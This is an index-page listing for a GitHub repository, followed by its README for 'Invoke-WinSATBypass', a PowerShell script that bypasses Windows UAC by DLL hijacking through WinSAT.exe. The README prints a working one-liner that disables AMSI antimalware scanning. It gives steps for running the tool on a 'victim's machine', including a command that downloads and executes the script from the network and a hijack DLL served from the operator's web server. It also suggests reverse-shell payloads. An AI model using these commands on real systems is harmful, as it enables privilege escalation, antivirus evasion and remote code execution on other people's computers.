Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/b4keSn4ke/Invoke-WinSATBypass
Powershell UAC Bypass script leveraging WinSAT.exe
https://github.com/b4keSn4ke/Invoke-WinSATBypass
exploit exploitation exploits powershell uac uac-bypass uacbypass windows windows-10
Last synced: about 1 month ago
JSON representation
Powershell UAC Bypass script leveraging WinSAT.exe
- Host: GitHub
- URL: https://github.com/b4keSn4ke/Invoke-WinSATBypass
- Owner: b4keSn4ke
- License: apache-2.0
- Created: 2021-12-12T20:41:30.000Z (about 3 years ago)
- Default Branch: main
- Last Pushed: 2021-12-21T01:49:56.000Z (about 3 years ago)
- Last Synced: 2024-08-14T07:05:52.329Z (5 months ago)
- Topics: exploit, exploitation, exploits, powershell, uac, uac-bypass, uacbypass, windows, windows-10
- Language: PowerShell
- Homepage:
- Size: 754 KB
- Stars: 14
- Watchers: 2
- Forks: 3
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
- jimsghstars - b4keSn4ke/Invoke-WinSATBypass - Powershell UAC Bypass script leveraging WinSAT.exe (PowerShell)
README
# Invoke-WinSATBypass
## Description
This script will create a mock directory of `"C:\Windows\System32"` and copy a legitimate application of Windows (`WinSAT.exe`) into it.
It will after try to download a DLL called `version.dll`, which is loaded by default by `WinSAT.exe`, in order to perform a UAC Bypass by doing some DLL Hijacking.
There is a pre-compiled DLL in the project folder that will only launch a CMD instance as Administrator.
If you want to execute any other payload (reverse-shell, user add-on, etc...), you will need to compile a DLL yourself and serve it on your local web server
## Demo
![Demo](/img/demo.gif)## How to Run Invoke-WinSATBypass
---### AMSI Bypass
In most case, running this script will require us to bypass the Antimalware Scan Interface (AMSI). We can do so by typing the following command in a Powershell instance
```
[Ref].Assembly.GetType('System.Management.Automation.Amsi'+"Utils").GetField("amsiInit"+"Failed","NonPublic,Static").SetValue($null,$true);
```
### Running the script locallyIf you got the script locally on the victim's machine, you can run the script like this:
```
. .\Invoke-WinSATBypass.ps1
Invoke-WinSATBypass -HTTPServerIP [IP_ADDRESS]
```### Running the script as a string downloaded from the repo
If you prefer to fetch the script directly from the repo without having it on the disk:
```
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/b4keSn4ke/Invoke-WinSATBypass/main/Invoke-WinSATBypass.ps1');
Invoke-WinSATBypass -HTTPServerIP [IP_ADDRESS]
```
---